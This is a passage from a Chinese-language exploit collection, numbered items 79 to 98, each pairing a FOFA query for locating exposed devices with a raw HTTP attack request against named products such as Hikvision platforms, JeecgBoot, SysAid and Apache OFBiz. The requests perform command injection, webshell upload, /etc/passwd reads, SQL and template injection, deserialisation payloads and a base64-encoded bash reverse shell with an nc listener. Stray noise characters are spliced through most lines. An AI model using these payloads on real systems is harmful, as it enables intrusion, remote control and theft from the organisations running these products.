------YsOxWxSvj1KyZow1PTsh98fdu6l--$ x- s& M0 r0 Y4 i1 m) b
" a! x* z6 ^; s' q2 K* p8 z: N5 Y) b- D3 p( U' P9 u
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1) @" b% k# R3 k7 R. ?
Host: x.x.x.x
* ]# Q$ I* B& r# u# N! R7 S7 [( z+ I8 O& z. y
' L0 Z2 _. i" I9 s' q79. BYTEVALUE 百为流控路由器远程命令执行( h* O- H" j( d# V g# A# M/ N. r* k
FOFA:BYTEVALUE 智能流控路由器$ O. A5 I: c; L' S( c& M& K+ Y
GET /goform/webRead/open/?path=|id HTTP/1.1 T1 n" `2 i* {" q- I3 ]2 D7 a3 [& K9 V
Host:IP
; o9 _ O; N2 ]: G. @; Q! kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
" i9 L# u6 K) d- ]2 SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" T( z B! W' W& {8 T2 DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% D! t6 q# T; @% W" o" V" ^Accept-Encoding: gzip, deflate
0 T$ M3 R/ ], u3 Q( zConnection: close
: I+ U0 M' Z: j/ S X- R4 SUpgrade-Insecure-Requests: 1
" C. m- b2 k% c( b+ @; |3 O* V' c
7 ?1 q6 E: X: C8 w: m- y$ t$ D# Z
% d) [' x! `% H" m V3 z80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传2 t" X5 a/ A9 W/ P: K6 F* g J
FOFA:app="速达软件-公司产品"
; g+ n+ ^" G8 U1 w fPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1& }! v. `* L' I% R" w/ o8 |
Host: x.x.x.x
+ p6 |- @4 b/ p1 KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; P- H+ b, q' n" C5 CContent-Length: 27, Z4 S2 }+ S8 C a" \7 w7 X2 x+ U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: L$ d$ F" E- |6 _& v
Accept-Encoding: gzip, deflate, W; h4 A9 c' R( e0 R4 a
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 F* Y. A; B" `; m6 x" y' S7 S
Connection: close
; C5 M! g1 V) V/ V8 i. w, `Content-Type: application/octet-stream" ]# B( _0 w+ L8 R" i- W# I. B$ F$ ?
Upgrade-Insecure-Requests: 1. e. i/ c# R6 ?+ N* R5 a+ B
) r+ o; W: O' W1 _4 s I# I u( G<% out.print("oessqeonylzaf");%>7 B/ I# @: ?; z# b2 j
& K1 k8 |: M) Y( M4 N+ I
- H, s5 O3 H9 c4 C+ X" p/ DGET /xykqmfxpoas.jsp HTTP/1.1
1 a3 J6 V# g# m5 w2 uHost: x.x.x.x
9 y& H& v9 f3 ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ i. W) Q" M3 K' k" {
Connection: close
( f( w, s% c& y1 ], R1 N9 vAccept-Encoding: gzip& F. ]! D# h2 [' I0 @
* y2 C [5 @% {2 W
" S0 Z! z5 k' Q# e81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
$ k% c4 q: `6 DFOFA:app="uniview-视频监控"# I& h3 `' W9 L P
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1' Z" {7 a. B4 l& t( U* H# ]9 i* g
Host: x.x.x.x
6 O" o# g7 `5 ?- L, xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 W! o; D( B' Z! X! aConnection: close6 D. |% u( t; f2 X' @6 Z0 _ y
Accept-Encoding: gzip/ n' ? M' ?5 d0 Z3 N! G8 w
% G0 g6 I0 {2 f! L9 n6 b1 V) C
* {" R! z% ^6 ^( x/ Q8 u& E& ~
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
5 k; |/ w8 Y! V6 bFOFA:app="思福迪-LOGBASE", r0 w6 |; _( x4 Z, e
POST /bhost/test_qrcode_b HTTP/1.13 r8 h3 I( Z5 Q( P2 c
Host: BaseURL
2 p" w6 q$ y- T; U+ g* v) G4 {4 p$ {4 lUser-Agent: Go-http-client/1.14 H' y9 E* Q# }% o
Content-Length: 23
2 K( V# P( Y; ~' d1 z- VAccept-Encoding: gzip
5 B- S' y( t1 ^+ d8 |$ LConnection: close
7 V6 O( S2 k0 `% c6 u7 d9 pContent-Type: application/x-www-form-urlencoded) I* a; v+ q1 r- P
Referer: BaseURL/ {# l' d8 d8 F9 M& g* E
. b. |0 @3 q3 c" J4 s8 C
z1=1&z2="|id;"&z3=bhost$ x2 p- Z m0 w2 h3 f* f
3 J) o: x' K6 c g d
/ b8 F$ Y! { u
83. JeecgBoot testConnection 远程命令执行
" m2 y- k: f$ k! X' E. oFOFA:title=="JeecgBoot 企业级低代码平台"
: m: P& h \, J; ?( O" k) r0 T- U8 Z# a
( `5 h! t5 p) P0 N3 I) i
POST /jmreport/testConnection HTTP/1.1. X2 I' B3 c, m o: t
Host: x.x.x.x
' b2 I7 e# c) X& }& r" _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) _8 I/ r9 e6 e3 Z& c( mConnection: close' H, E Y8 G. z* V1 E; V- \
Content-Length: 8881
8 Q( O& {! j6 d1 z4 t, H8 EAccept-Encoding: gzip
8 J" _# O7 ~% {% y6 RCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"& |2 I {! o& I# ]
Content-Type: application/json- S1 C6 m& H8 L2 N' i
}& l1 z& i, V, S4 MPAYLOAD9 d$ L& g) E" B
, V" D( Z5 }) Q' F) i
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入) r8 [% Y2 U4 A3 e% V0 v6 m
FOFA:title=="JeecgBoot 企业级低代码平台"
0 c9 L% a$ g: Q* v0 O! N# G! q5 c( i) w/ y9 {" z
- Q: S9 U& }7 y. b. G2 j. `1 w. m
0 B! h6 r E7 Y+ i
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1; ], b& [: S! |& F0 |9 U6 E/ R
Host: 192.168.40.130:8080
6 r( B! i3 u; \" {- EUser-Agent: curl/7.88.1
" b5 n+ E- K2 c4 k. _Content-Length: 156
: J2 d* Q3 J7 M$ S9 E' \. X8 ^Accept: */*
9 `+ d% } y5 y) s% h0 PConnection: close& _' B! \! M: D: P
Content-Type: application/json
& H# v6 g2 K+ f" _: EAccept-Encoding: gzip
1 N2 }. W! I' J2 ]/ J; `* v) Q2 G, ]& f# [$ M
{- ~& K! Z! t! `8 R1 o
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",5 Q c2 b( \. H2 r+ H
"type": "0"
6 Q% n7 P, Z( u8 Y5 F q}
5 R, O4 @+ h# I: \/ K0 V; \( }! O$ q: `, b/ D
! |/ H! T6 b* A
85. SysAid On-premise< 23.3.36远程代码执行6 v. ]* k4 Y2 h7 t! F' @" g
CVE-2023-47246
- e2 y4 U6 I! b, D( h% z3 T [FOFA:body="sysaid-logo-dark-green.png"
$ d1 n) ^% r/ y/ q' a* MEXP数据包如下,注入哥斯拉马- m7 A4 Q9 h w7 P
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1 H! v L4 `1 c$ P
Host: x.x.x.x6 A& B/ v0 [7 U! V- _: `. p* ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 B5 R/ }. p, C; R5 T' W' t
Content-Type: application/octet-stream
/ C* k& w1 U3 i3 S/ F! LAccept-Encoding: gzip9 S8 d. d; ~6 n) h) ?
6 G7 Z# v7 E9 g1 \. d9 ? ePAYLOAD
1 P3 d) Y2 ^. M# z: s
4 E2 v+ u V! ?' ^9 R+ @4 b回显URL:http://x.x.x.x/userfiles/index.jsp
1 _$ q+ h3 J b& y j6 c2 @: S, R) [( Q+ G0 V5 n8 {
86. 日本tosei自助洗衣机RCE& H2 A5 A7 ]. t7 k/ Y0 G
FOFA:body="tosei_login_check.php"3 o7 I. B9 a+ v% y7 p, B! @
POST /cgi-bin/network_test.php HTTP/1.1" r0 b) r7 D) Z/ ~" E. b9 v7 Y# L
Host: x.x.x.x4 r/ K0 Y% j* X F" v0 ~
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
( r: E3 D6 O2 c& H" ^8 I ~9 }Connection: close1 y/ O+ L% Q# J
Content-Length: 44
7 }; T; x* W0 Y. HAccept: */*; v6 K& P7 d$ N$ Q- I
Accept-Encoding: gzip
8 v7 R2 ?4 [" ?) }; p8 J* f* `/ EAccept-Language: en+ W' R' X7 c8 E$ L
Content-Type: application/x-www-form-urlencoded) A+ Y+ B9 f2 q
, `4 q: T% Z7 ?! P. B7 Khost=%0acat${IFS}/etc/passwd%0a&command=ping
( h* T( `. V. @3 Y0 l8 G! k4 |* ~5 l f) K [. J8 h3 Q! \% J
$ }4 b, A1 @) R( c6 b- I3 G" T. r
87. 安恒明御安全网关aaa_local_web_preview文件上传0 B$ K- i, n! u9 S, T0 I
FOFA:title="明御安全网关"! m/ d1 }; Q9 W* l% d; c- u0 |- f6 q6 L/ ?
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
% ^) T P- y5 S$ ]2 DHost: X.X.X.X( S0 T0 z6 s, b4 x* p3 @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* d- `& S+ R# F: I" L8 U, [* `
Connection: close; G/ {' R9 ]! @1 Q8 p& ?' [# @
Content-Length: 198" k7 ?4 [0 P. a, ]" |
Accept-Encoding: gzip* X6 V# `$ u& y6 N( v8 _1 ]
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
1 D8 _3 r) x5 c2 L& e- {0 g6 b8 H. V l/ U: \
--qqobiandqgawlxodfiisporjwravxtvd& d) ~: c8 M- b; p8 X
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php", a. s) P A, F$ g
Content-Type: text/plain
: X3 b M1 l$ |- I2 |, M% S5 R A, s- V- ^' I8 M
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
' J# o" }6 h$ V( o; d5 h--qqobiandqgawlxodfiisporjwravxtvd--; K% |; G' Y" ~& G1 Z
) `6 u$ d# l% \, {
* E0 t/ f2 j, f6 X" l2 D; W" C. s/jfhatuwe.php/ n/ |7 ~, ?" d, N+ [
8 n$ P/ _0 F) f
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行: g9 B6 r$ N( F
FOFA:title="明御安全网关"
' K9 Q% @9 E2 zGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1" ?7 n% E* J! P/ J4 _
Host: x.x.x.xx.x.x.x
4 C @3 m# Y3 M4 |; Z" GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 H# `' g3 R ?9 @. b! mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; o" ~( U1 q- O% N- f' KAccept-Encoding: gzip, deflate `/ \$ \4 o+ s4 `4 h1 R5 s5 |. H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 q9 S' T% m. N5 i
Connection: close- [; f' ^( j$ x4 O7 q! S, s
$ Z; c+ i+ n1 K6 n& G/ K
- y+ Q, t2 K; k t; }$ c" M* P
/astdfkhl.php' i% J) T/ R' ^. M
( x, E! i' z. O- E1 ~89. 致远互联FE协作办公平台editflow_manager存在sql注入3 x! K1 i8 [* d& v- K" u% x m0 ~
FOFA:title="FE协作办公平台" || body="li_plugins_download"
8 }0 x& ?! _2 @; r3 b0 i3 \POST /sysform/003/editflow_manager.js%70 HTTP/1.18 d; M1 N1 Y5 ~+ k* C* J
Host: x.x.x.x
1 s+ @( _# [1 A/ I5 CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 ~/ ^' l3 u& e- ^% h+ e9 qConnection: close
& v4 o9 L9 v# x3 L- VContent-Length: 416 i% D1 R" G2 [: r8 ?- a* I1 B! y
Content-Type: application/x-www-form-urlencoded8 Z1 @/ r% T; e. E* ^
Accept-Encoding: gzip* l: B. [7 L; V( A9 m
4 z8 K8 @$ ^* ?option=2&GUID=-1'+union+select+111*222--+
) d4 ]% S7 `. e/ |# {% B/ V. Q
8 v( P) g* {( R' d4 q0 b- E* L. U9 g$ y; h
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行# [' x' {5 _, a% s) K+ |" ~
FOFA:icon_hash="-1830859634"" q9 a; r6 Y" O/ w0 F2 C* n
POST /php/ping.php HTTP/1.15 z+ F" G+ T t7 R
Host: x.x.x.x
" I5 ]5 o3 j; H, C- J; D- yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
" w1 \7 I% z4 W% x9 DContent-Length: 51
$ T; @/ k, S* W$ R- M% _. a nAccept: application/json, text/javascript, */*; q=0.01' _ n7 O$ v9 ~$ I6 H T% ]: D
Accept-Encoding: gzip, deflate
9 L# Z/ ]8 b" G$ l9 vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 [% \+ @: s, H, L0 T5 DConnection: close
2 L I1 O3 y! Y M) @Content-Type: application/x-www-form-urlencoded& } J* ? q# F+ h
X-Requested-With: XMLHttpRequest
1 V1 k0 ?5 U5 e' o- ~/ l- d1 }
8 u+ K, J: t! W2 E" ^" P4 l% hjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig- ]- ~. V1 Q! L6 G; W
! @9 T# B. q! ]$ m1 `0 d6 d2 f0 U2 g+ Q7 R, G3 q9 W+ R
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取9 s$ r# T5 l0 d) z
FOFA:title="综合安防管理平台"
6 O! r+ ` q' j4 t: e5 F W7 XGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.18 }# _) ]* v9 o) v9 q- K2 c
Host: your-ip) K2 F& P4 ^. z& G/ q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.366 {' Q( f5 X- E* y
Accept-Encoding: gzip, deflate
1 F1 d0 N) t! pAccept: */*
; e) N z/ G" FConnection: keep-alive1 l) v w/ t% }/ L' @( [1 p5 Y
" E- W- o7 Z/ H. f( a0 W+ j0 }4 L0 {- n: Z) k2 E
4 B j' W! r$ a& V92. 海康威视运行管理中心session命令执行7 _. @6 d. d/ j$ q
Fastjson命令执行
* `+ Q% N% ~/ _6 w1 xhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
7 O$ q" G5 b/ y6 F# B, m: OPOST /center/api/session HTTP/1.17 }0 S7 u/ c L, d) O! h
Host:
$ W7 A$ a+ C3 H8 aAccept: application/json, text/plain, */*+ b, k- J0 k% z5 ^$ n' \# |2 W
Accept-Encoding: gzip, deflate% }5 z( C* W/ } p
X-Requested-With: XMLHttpRequest
4 d: T5 | c% l8 yContent-Type: application/json;charset=UTF-86 n' ^" E1 u" F& [6 w: J* e
X-Language-Type: zh_CN& M1 r6 Q0 {( l
Testcmd: echo test
" N: {( b% l& {$ c& U/ Y& FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36+ ~: k% D# d- K/ `
Accept-Language: zh-CN,zh;q=0.9$ `" {! c( k% V2 ^, I5 W
Content-Length: 5778! d" d9 ]& l8 C( V' ~3 l
! Y0 j* b7 e8 |) v' k5 K
PAYLOAD+ g; T' S& g+ [! T L6 ]
* D/ _+ e5 K# l% b; ]6 L I- A- z' c0 a' _9 _9 `; j
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传: U) G- A" v# z, a- d g. m
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="$ b3 H6 g- s5 E4 \/ ~. R# }
POST /?g=app_av_import_save HTTP/1.1
: J- ?! D. K. pHost: x.x.x.x
0 e G5 I% X- \: zContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx! D, y3 @: [. {3 h. Q9 A/ y
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
* Y0 A' r5 L9 T7 ^9 @$ n, ]% J8 x/ b: n
------WebKitFormBoundarykcbkgdfx" x2 j m1 g8 L- L
Content-Disposition: form-data; name="MAX_FILE_SIZE"( I5 T R% Y) l/ u
, p% C% K( e- R6 H: g7 I10000000! u1 h4 M9 y: T7 ]
------WebKitFormBoundarykcbkgdfx
: i1 S# W: j# ?) R6 a9 n1 e4 ]: kContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
5 Y6 W8 f+ ^+ {Content-Type: text/plain
. A) l. ~. H% A* U, A$ y, I
9 y$ B) j8 ]5 W/ R/ `* Uwagletqrkwrddkthtulxsqrphulnknxa
3 ]% [" s8 l G+ r' h9 v" I------WebKitFormBoundarykcbkgdfx7 H8 V4 B- w5 E+ X
Content-Disposition: form-data; name="submit_post"
, f6 D3 `- Q& L' N+ M# E1 \/ c& x
5 T' S$ z: k3 m. C' F3 H& oobj_app_upfile
5 l# \* o& ?" M, X7 z) J* R+ G------WebKitFormBoundarykcbkgdfx
R, d& x$ L0 t& p4 |- lContent-Disposition: form-data; name="__hash__"
: ]- x# e/ C) D2 K% y; m! d
; D" o, F5 y, o( _% w0b9d6b1ab7479ab69d9f71b05e0e94455 ^0 W' X- n* I+ n( C1 d! F5 p8 i
------WebKitFormBoundarykcbkgdfx--
' K! x$ F2 E- a, ]& g' W' b$ P: M
, m. s, M" b' G- r$ _9 ~4 u& u8 V" `/ E0 u: {, s0 u$ H& I8 [" u
GET /attachements/xlskxknxa.txt HTTP/1.1
" T6 J3 g+ ~0 _) u& u. bHost: xx.xx.xx.xx
; p, x% {, U$ J' XUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
d, g: K% ~. n( X. S9 P. O. c8 N* c( K
' q& Z1 I6 i- m. Y- v* Q1 _94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
/ M, K+ F/ n- _) Y, V6 RFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="* ~1 s, s* a: j( I" P0 j( N1 p
POST /?g=obj_area_import_save HTTP/1.1
$ s+ f {0 D; d I5 THost: x.x.x.x
F0 |& |; k: K+ h! EContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt1 k' K1 U& a1 q6 s9 ]/ P5 x: t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
! b* G: B+ g. L5 {8 _. k7 I; K; Y8 y: L, \6 ]
------WebKitFormBoundarybqvzqvmt
, O6 z/ c3 ?0 Z4 Q5 uContent-Disposition: form-data; name="MAX_FILE_SIZE"
V4 _2 e& F/ ^ g3 _
" C6 }4 s4 i u* A100000008 F, B9 v: C/ A v) ?
------WebKitFormBoundarybqvzqvmt
+ C2 p% x# Q9 x; @/ KContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt": N0 h$ @6 J4 Y3 u1 O2 C. g
Content-Type: text/plain
4 p0 u& c3 O/ t5 Z' j% S
" V; ]) l' o+ L% R8 Vpxplitttsrjnyoafavcajwkvhxindhmu* N! h, _& p$ z4 z! ~
------WebKitFormBoundarybqvzqvmt5 e) \3 h' |) V# N
Content-Disposition: form-data; name="submit_post"
2 N# o& J- v# O# q0 {* B6 L1 z
1 c1 b+ D: M6 A8 q7 m- ]; _6 [obj_app_upfile
4 V( j/ d2 N2 I' M) |$ b------WebKitFormBoundarybqvzqvmt
! v7 K4 b2 o; N4 RContent-Disposition: form-data; name="__hash__"
. Y& x% t& r' E- Q7 r+ R0 T) X$ ?' j% t1 B
0b9d6b1ab7479ab69d9f71b05e0e9445* N' z. R# t( J! o
------WebKitFormBoundarybqvzqvmt--# c) U0 [2 u) P4 j
n+ b7 Z7 y8 J$ m& u6 l/ g/ M2 ?7 f5 R9 E
- v2 |' o; ?2 v8 GGET /attachements/xlskxknxa.txt HTTP/1.18 p. M& T( p1 F7 n% l
Host: xx.xx.xx.xx
2 o. r9 O7 J- [( Y9 m9 `. R2 pUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.360 ]; K1 h% O: l$ q# y, @4 X
2 [; [( ]; m5 K
; {6 P/ B' s* w/ g7 t1 g
# I4 [6 T, Y8 y. z$ B' d
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
. A6 Q5 J4 @" g9 lCVE-2023-49070+ B# h g0 i6 q0 _ l- {1 H5 a$ h
FOFA:app="Apache_OFBiz"4 t. D/ X' E0 X
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
\3 e- @5 |2 G+ w$ F9 l+ o; d6 IHost: x.x.x.x4 q' _7 y1 @5 v$ a
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
# w6 k8 p- K% NConnection: close
A& R# O* |: h# O" \0 [Content-Length: 889
- E8 |- W, a5 F" ~9 p& XContent-Type: application/xml
- y- c! n' c; C8 J: ?* \) i$ g" N2 vAccept-Encoding: gzip$ B* M7 Q2 _# n! _8 U/ w
" `9 O. c0 L% E: F) ^<?xml version="1.0"?>
: P g, P; b: J. r; R<methodCall>5 Q& d1 v$ }+ w7 K* v N5 ]& u8 @$ D k% \
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
% U, s; D* W r3 ] <params>
/ ?( i9 I2 t( n! M9 ^( f# e* h$ F3 i0 c$ d <param>9 z7 X8 E9 k$ t, i4 @7 C# r& d" _
<value>
- O- h- ^% s, N <struct>
8 D# }: n1 q* P; \ Y1 J. ]" O <member>
; P/ m$ E! I1 s4 m+ h/ H <name>test</name>- V5 j( v" h: S3 L/ e- S" G
<value>
, I1 ]: J/ L' N& p, j <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
+ ]+ Z3 ?1 B3 c, s. u0 `6 J d) S </value>; m" y5 f/ c0 R6 _( g" r' P
</member>, {0 P7 [$ p( w( a- b
</struct>+ @8 S( ~, x- I5 u5 [/ F& F( a
</value>( _' v6 l1 R$ S+ r) `3 ^* N
</param>' A8 ^4 k. [( v0 z
</params>
, P6 L1 n* r5 A, M* Z</methodCall>
' j" r! w* V% b0 f+ g) f
, k: ^! }0 I0 Y- i2 S( d! n
6 L! t- T2 u; u4 j1 ^* j用ysoserial生成payload
- k C+ D; }) M. j( p9 M. _java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
3 ]# J0 I9 V v9 I" P
) G; o9 M, d1 \+ M: Z0 ]( d- [+ o# [" Z6 K% `* o
将生成的payload替换到上面的POC
+ E( Z, g+ ^* C2 ^POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
! A# f6 V6 }1 {$ sHost: 192.168.40.130:8443
$ ?9 a* Z/ f% H' MUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36/ v; E3 \) r# P, F, D
Connection: close- q9 Z2 o, l; H6 }0 j
Content-Length: 889
, E+ F5 O$ V, y) B/ w" ^Content-Type: application/xml; F% t e; W! C& f L. d8 z, {
Accept-Encoding: gzip
7 A, P3 R: G3 t$ r6 w
) l8 `2 x' k! g6 \PAYLOAD2 v$ m6 h8 ?) a4 L
& s# V: H" b- ~0 @3 z I96. Apache OFBiz 18.12.11 groovy 远程代码执行
/ d3 M7 Q7 ]$ E" lFOFA:app="Apache_OFBiz"9 _* g& t$ Y0 U3 W& H8 K& z$ @8 [
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
& s ~/ J# J# H& J5 d: r& W A8 x; xHost: localhost:84431 l/ R/ _8 l' B- Z7 ]9 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0: H! q8 j b+ H! Q5 S
Accept: */*
; j2 X" \$ Y9 T6 N2 ]Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 E8 x, x' j G5 s: J( }Content-Type: application/x-www-form-urlencoded! `4 \3 L% P! `7 `* J8 L. X
Content-Length: 550 L% j8 H$ p* S
0 ~; h( I4 Y6 D; D
groovyProgram=throw+new+Exception('id'.execute().text);
F3 T6 Z4 l) |, b2 {4 \; Z+ B6 H8 |# f) v2 h
: u; g7 p% w7 @1 B% x反弹shell7 i. U% U: s$ O$ D" B9 R
在kali上启动一个监听
' D. J9 ]; D- i4 @7 vnc -lvp 7777
& r- } O0 {) l7 |( F7 g# T: Z6 ~0 w* r) F; G! I+ q
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
2 ?, \7 C+ J* }Host: 192.168.40.130:8443
7 Y+ T* k/ q( M# ]) J9 X L* KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
1 u( z4 q; }; g2 t" ZAccept: */*
- C/ y( U, I+ p; dAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 F" F, M; H5 |
Content-Type: application/x-www-form-urlencoded
6 A' k$ K* m5 S4 qContent-Length: 714 V; @; I. }' i9 y
) j. {7 Y4 ~; m, x1 ]9 k. e0 _' H; T
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();* s0 B* `. L2 v6 Q8 u
5 j$ C5 R* @ Y; l97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行: f! R1 s+ ]& U" p+ ~7 z0 h
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
( v& v: m, F- r2 O! j: y) N# O$ lGET /passport/login/ HTTP/1.16 |* f' P G. ?
Host: 192.168.40.130:8085
! |, ?- d4 L3 s9 VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" q/ M( `. P P5 GAccept-Encoding: gzip- g1 f1 b7 o. O3 z
Connection: close+ q, s3 W9 @8 `+ P
Cookie: rememberMe=PAYLOAD: M) P1 r" g& l; e: {+ l- l' c
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"- Q) P/ t6 T7 {# y
, p) P1 n* c& y. z9 [
/ I* |! f; F5 U! B7 p4 }98. SpiderFlow爬虫平台远程命令执行
. F y1 `! r) @) D9 N& {CVE-2024-0195
% D9 V. N8 ^. q5 P# ~# T0 aFOFA:app="SpiderFlow"
/ A' \8 Q9 d& |4 X: X8 ~POST /function/save HTTP/1.1% w$ ^2 s* N( H1 H8 V
Host: 192.168.40.130:80886 j3 G- N+ D8 Z* B/ x9 j& f4 V1 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
4 s) e) l4 ^* `) M& WConnection: close
4 j9 b, d r* |9 P2 ]Content-Length: 121: w1 K/ Z) z9 L- f0 d
Accept: */*- z/ t0 c3 `- Z
Accept-Encoding: gzip, deflate
